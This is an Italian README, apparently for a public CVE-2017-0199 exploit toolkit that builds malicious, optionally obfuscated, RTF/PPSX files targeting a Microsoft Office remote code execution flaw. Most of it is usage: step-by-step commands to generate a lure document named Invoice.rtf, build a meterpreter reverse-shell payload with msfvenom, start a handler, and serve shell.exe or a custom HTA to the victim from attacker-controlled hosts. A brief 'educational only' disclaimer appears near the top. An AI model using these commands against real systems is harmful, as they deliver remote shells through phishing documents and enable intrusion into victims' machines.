
Exploit toolkit CVE-2017-0199 - v4.0 è un pratico script Python che fornisce a pentester e ricercatori di sicurezza un modo rapido ed efficace per testare la RCE di Microsoft Office. Può generare un file RTF/PPSX dannoso e consegnare payload metasploit / meterpreter / altri alla vittima senza alcuna configurazione complessa.
Il toolkit di exploit CVE-2017-0199 - v4.0 è un comodo script Python che fornisce a penetration tester e ricercatori di sicurezza un modo rapido ed efficace per testare RCE di Microsoft Office. Può generare un file RTF/PPSX malevolo e consegnare metasploit / meterpreter / altri payload alla vittima senza alcuna configurazione complessa.
Questo programma è SOLO a scopo educativo. Non utilizzarlo senza autorizzazione. Si applica la consueta clausola di esclusione di responsabilità, in particolare il fatto che io (bhdresh) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi fornitore di servizi Internet NON si assume alcuna responsabilità per il contenuto o l'uso improprio di questi programmi o di loro derivati. Utilizzando questo programma accetti il fatto che eventuali danni (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causati dall'uso di questi programmi non sono di responsabilità di bhdresh.
Infine, questo è uno sviluppo personale, per favore rispettane la filosofia e non usarlo per scopi malvagi!
CC BY 4.0 licenza - https://creativecommons.org/licenses/by/4.0/
Introdotte le seguenti capacità nello script
- Generare file PPSX malevolo
- Modalità di sfruttamento per file PPSX generato
- Template.ppsx aggiornato
Versione: Python versione 2.7.13
1) Genera il file RTF malevolo
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) (Opzionale, se si utilizza Payload MSF): Genera payload metasploit e avvia handler
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Avvia il toolkit in modalità exploit per consegnare payload locale
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

1) Genera il file RTF malevolo
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc
2) Avvia il toolkit in modalità exploit per consegnare payload remoto
# python cve-2017-0199_toolkit.py -M exp -t RTF -e http://remoteserver.com/shell.exe

1) Genera il file RTF malevolo
# python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.56.1/logo.doc -x 1
2) Avvia il toolkit in modalità exploit per consegnare file HTA personalizzato
# python cve-2017-0199_toolkit.py -M exp -t RTF -H /tmp/custom.hta

# python cve-2017-0199_toolkit.py -h
Questo è un comodo toolkit per sfruttare CVE-2017-0199 (RCE di Microsoft Office)
Modalità:
-M gen Genera solo file malevolo
Genera file RTF/PPSX malevolo:
-w <Filename.rtf/Filename.ppsx> Nome del file RTF/PPSX malevolo (Condividi questo file con la vittima).
-u <http://attacker.com/test.hta> Il percorso di un file HTA/SCT. Normalmente, dovrebbe essere un dominio o IP dove questo
tool è in esecuzione.
Ad esempio, http://attackerip.com/test.doc (Questo URL sarà incluso nel file RTF/PPSX
malevolo e verrà richiesto una volta che la vittima aprirà il file RTF malevolo).
-t RTF|PPSX (predefinito = RTF) Tipo di file da generare.
-x 0|1 (predefinito = 0) Genera file RTF offuscato. 0 = Disabilita, 1 = Abilita.
-M exp Avvia modalità exploit
Sfruttamento:
-t RTF|PPSX (predefinito = RTF) Tipo di file da sfruttare.
-H </tmp/custom> Percorso locale di un file HTA/SCT personalizzato da consegnare ed eseguire sul target.
NOTA: Questa opzione non consegnerà i payload specificati tramite le opzioni "-e" e "-l"
-p <TCP port:Default 80> Numero di porta locale.
-e <http://attacker.com/shell.exe> Il percorso di un file eseguibile / shell meterpreter / payload che deve essere eseguito sul target.
-l </tmp/shell.exe> Se il payload è ospitato localmente, specifica il percorso locale di un file eseguibile / shell meterpreter / payload.
@nixawk per il campione RTF, @Li Haifei, @bhdresh
Ovviamente non sono uno sviluppatore a tempo pieno, quindi aspettati qualche intoppo.
Segnala bug, problemi tramite https://github.com/bhdresh/CVE-2017-0199/issues/new